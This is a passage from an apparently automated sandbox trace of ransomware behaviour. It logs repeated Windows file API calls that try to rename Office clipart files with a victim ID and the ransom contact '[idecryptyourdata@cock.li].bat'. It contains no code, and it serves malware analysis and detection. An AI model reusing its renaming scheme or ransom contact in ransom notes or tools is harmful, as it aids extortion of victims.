Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185800.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.311] CloseHandle (hObject=0x434) returned 1 [0166.312] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.312] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341448.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341448.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.312] CloseHandle (hObject=0x434) returned 1 [0166.313] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.313] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341455.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341455.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.313] CloseHandle (hObject=0x434) returned 1 [0166.315] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.315] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341475.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341475.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.315] CloseHandle (hObject=0x434) returned 1 [0166.316] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.316] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341499.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341499.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.316] CloseHandle (hObject=0x434) returned 1 [0166.317] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.317] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341534.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341534.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.318] CloseHandle (hObject=0x434) returned 1 [0166.318] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.318] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341551.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341551.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.319] CloseHandle (hObject=0x434) returned 1 [0166.319] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.319] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341554.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341554.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.320] CloseHandle (hObject=0x434) returned 1 [0166.320] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.320] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341557.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341557.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.321] CloseHandle (hObject=0x434) returned 1 [0166.322] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.322] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341559.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341559.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.322] CloseHandle (hObject=0x434) returned 1 [0166.323] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.323] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341561.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341561.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.323] CloseHandle (hObject=0x434) returned 1 [0166.324] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.325] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341634.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341634.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.325] CloseHandle (hObject=0x434) returned 1 [0166.326] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.326] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341636.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341636.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.343] CloseHandle (hObject=0x434) returned 1 [0166.344] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.344] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.344] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341645.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341645.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.345] CloseHandle (hObject=0x434) returned 1 [0166.346] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.346] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341653.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341653.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.346] CloseHandle (hObject=0x434) returned 1 [0166.347] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.348] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341654.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341654.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.348] CloseHandle (hObject=0x434) returned 1 [0166.348] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.349] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341738.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341738.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.349] CloseHandle (hObject=0x434) returned 1 [0166.350] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.350] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341742.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341742.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.350] CloseHandle (hObject=0x434) returned 1 [0166.351] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.351] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382836.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382836.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.351] CloseHandle (hObject=0x434) returned 1 [0166.352] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.352] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382925.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382925.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.352] CloseHandle (hObject=0x434) returned 1 [0166.353] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.353] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382926.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382926.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.353] CloseHandle (hObject=0x434) returned 1 [0166.355] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.355] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382927.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382927.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.355] CloseHandle (hObject=0x434) returned 1 [0166.356] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.356] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382930.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382930.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.357] CloseHandle (hObject=0x434) returned 1 [0166.358] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.358] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382931.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382931.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.359] CloseHandle (hObject=0x434) returned 1 [0167.780] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.780] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382938.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382938.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.802] CloseHandle (hObject=0x434) returned 1 [0167.803] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.803] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00389_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00389_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.803] CloseHandle (hObject=0x434) returned 1 [0167.804] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.805] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00390_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00390_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.805] CloseHandle (hObject=0x434) returned 1 [0167.806] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.806] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00391_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00391_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.806] CloseHandle (hObject=0x434) returned 1 [0167.812] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.812] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00394_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00394_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.813] CloseHandle (hObject=0x434) returned 1 [0167.814] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.814] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00395_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00395_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.815] CloseHandle (hObject=0x434) returned 1 [0167.816] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.816] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00396_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00396_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.816] CloseHandle (hObject=0x434) returned 1 [0167.817] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.817] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00417_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00417_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.818] CloseHandle (hObject=0x434) returned 1 [0167.818] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.818] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00433_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 